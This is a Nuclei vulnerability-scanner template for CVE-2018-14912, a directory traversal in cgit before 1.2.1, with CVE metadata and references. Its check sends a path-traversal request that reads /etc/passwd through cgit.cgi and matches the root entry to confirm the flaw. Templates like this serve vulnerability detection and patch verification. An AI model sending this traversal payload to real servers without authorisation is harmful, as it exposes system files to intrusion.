nuclei-templates/cves/2018/CVE-2018-14912.yaml

36 lines
1.0 KiB
YAML

id: CVE-2018-14912
info:
name: cgit < 1.2.1 - Directory Traversal
author: 0x_Akoko
severity: high
description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.
reference:
- https://cxsecurity.com/issue/WLB-2018080034
- https://nvd.nist.gov/vuln/detail/CVE-2018-14912
- https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html
- https://bugs.chromium.org/p/project-zero/issues/detail?id=1627
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-14912
cwe-id: CWE-22
tags: cve,cve2018,cgit,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/04/18